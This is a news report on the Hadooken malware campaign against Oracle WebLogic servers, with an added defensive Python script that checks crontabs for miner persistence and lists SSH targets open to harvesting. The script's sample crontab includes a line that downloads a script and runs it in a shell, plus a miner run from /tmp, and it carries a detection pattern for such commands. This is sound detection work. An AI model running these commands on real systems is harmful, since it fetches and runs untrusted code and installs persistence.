Cybersecurity researchers have identified a new malware campaign targeting Linux systems to carry out unauthorized cryptocurrency mining and deliver botnet malware.
The campaign, which specifically targets Oracle WebLogic servers, delivers a malware strain known as Hadooken, according to cloud security firm Aqua.
“When Hadooken is executed, it drops Tsunami malware and initiates a crypto miner,” explained security researcher Assaf Morag.
The attack exploits known vulnerabilities and misconfigurations, such as weak credentials, to gain an initial foothold and execute arbitrary code on vulnerable instances.
Two nearly identical payloads, one in Python and the other a shell script, are used to retrieve the Hadooken malware from remote servers (“89.185.85[.]102” or “185.174.136[.]204”).
Additionally, the shell script variant scans various directories containing SSH data (like user credentials, host details, and secrets) to attack known servers, Morag added.
“It then moves laterally across the organization or connected systems, further propagating the Hadooken malware.”
Key components
Hadooken contains two key components:
- a cryptocurrency miner
- and a distributed denial-of-service (DDoS) botnet known as Tsunami (also referred to as Kaiten), which has previously targeted Jenkins and WebLogic services running in Kubernetes clusters.
The malware also establishes persistence on the host by setting up cron jobs to periodically trigger the crypto miner at different intervals.
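The two host-side behaviours just described (harvesting SSH data for lateral movement, and cron jobs that relaunch the miner at several intervals) are what a responder would check for first on a suspect WebLogic host. The script below is an added example and is not code from Aqua, TheHackerNews or the Hadooken campaign itself: it flags crontab entries that run from world-writable staging directories, pipe a download into a shell, or schedule the same program at more than one interval, and it enumerates the SSH targets a script in the attacker's position could harvest from `~/.ssh/known_hosts` and `~/.ssh/config`. The heuristics, the sample crontab, the host names and the address 198.51.100.7 are all constructed for illustration, not published indicators.

```python
"""Added host-triage example; not code from Aqua, the article or the malware.
Heuristics and all sample data below are constructed assumptions."""
import re
from dataclasses import dataclass, field

# Assumed heuristics: staging dirs an attacker can write to, and download-and-run.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


@dataclass
class CronFinding:
    schedule: str
    command: str
    reasons: list = field(default_factory=list)


def parse_crontab(text):
    """Return (schedule, command) pairs; skips comments and VAR=value lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):                 # @reboot, @hourly, ...
            parts = line.split(None, 1)
        else:                                    # five time fields, then command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            parts = [" ".join(parts[:5]), parts[5]]
        if len(parts) == 2:
            entries.append((parts[0], parts[1]))
    return entries


def find_suspicious_cron(text):
    """Flag persistence-like entries; a clean entry produces no finding."""
    entries = parse_crontab(text)
    schedules = {}                               # program -> set of schedules
    for schedule, command in entries:
        schedules.setdefault(command.split()[0], set()).add(schedule)
    findings = []
    for schedule, command in entries:
        f = CronFinding(schedule, command)
        if any(d in command for d in STAGING_DIRS):
            f.reasons.append("runs from a world-writable staging directory")
        if DOWNLOAD_EXEC.search(command):
            f.reasons.append("downloads and pipes into a shell")
        if len(schedules[command.split()[0]]) > 1:
            f.reasons.append("same program scheduled at multiple intervals")
        if f.reasons:
            findings.append(f)
    return findings


def ssh_targets(known_hosts, ssh_config):
    """Return (sorted harvestable targets, count of hashed known_hosts lines).
    Hashed entries (HashKnownHosts yes) cannot be reversed, so only counted."""
    targets, hashed = set(), 0
    for raw in known_hosts.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                 # @cert-authority / @revoked
            line = line.split(None, 1)[1]
        hostfield = line.split()[0]
        if hostfield.startswith("|1|"):
            hashed += 1
            continue
        for h in hostfield.split(","):
            if h.startswith("["):                # [host]:port form
                h = h[1:h.index("]")]
            if not any(c in h for c in "*?!"):   # skip patterns
                targets.add(h)
    alias = None                                 # single-alias Host blocks only
    for raw in ssh_config.splitlines():
        parts = raw.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "host":
            alias = None if any(c in value for c in "*?!") else value
            if alias:
                targets.add(alias)
        elif key == "hostname" and alias:
            targets.discard(alias)               # real host replaces alias
            targets.add(value)
    return sorted(targets), hashed


# Constructed sample data (198.51.100.7 is a documentation-range address).
SAMPLE_CRONTAB = """SHELL=/bin/sh
# nightly backup, legitimate
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /tmp/.x/miner -c /tmp/.x/conf.json
@reboot /tmp/.x/miner -c /tmp/.x/conf.json
0 */6 * * * curl -s http://198.51.100.7/s.sh | sh
"""
SAMPLE_KNOWN_HOSTS = """10.0.0.5 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKey
[10.0.0.6]:2222,db-backup ssh-rsa AAAAB3NzaC1yc2EAAAAExampleKey
|1|c2FsdA==|aGFzaA== ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKey
"""
SAMPLE_SSH_CONFIG = """Host bastion
    HostName bastion.corp.example
    User deploy
    IdentityFile ~/.ssh/id_deploy
Host *
    ServerAliveInterval 30
"""

if __name__ == "__main__":
    for f in find_suspicious_cron(SAMPLE_CRONTAB):
        print(f"[cron] {f.schedule!r} {f.command}: {'; '.join(f.reasons)}")
    hosts, hidden = ssh_targets(SAMPLE_KNOWN_HOSTS, SAMPLE_SSH_CONFIG)
    print(f"[ssh] harvestable targets: {hosts} ({hidden} hashed entries hidden)")
```

On a real host the same functions would be fed the output of `crontab -l` for each user, the files under `/etc/cron.d`, and each user's `.ssh` directory. The hashed known_hosts case is the point worth noting: with `HashKnownHosts yes` the attacker's shell script still finds the file, but it learns no hostnames from it, which directly limits the lateral-movement step the article describes.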
According to Aqua, the IP address 89.185.85[.]102, registered in Germany under the hosting provider Aeza International LTD (AS210644), has been linked to an 8220 Gang cryptocurrency campaign, previously reported by Uptycs in February 2024. This campaign exploited vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center.
The second IP address, 185.174.136[.]204, while currently inactive, is also connected to Aeza Group Ltd. (AS216246). Reports from Qurium and EU DisinfoLab in July 2024 revealed that Aeza is a bulletproof hosting service with operations in Moscow M9 and two data centers in Frankfurt.
“Aeza’s rapid growth can be attributed to its recruitment of young developers associated with Russian bulletproof hosting providers, offering a safe haven for cybercrime activities,” the researchers concluded.
Source: TheHackerNews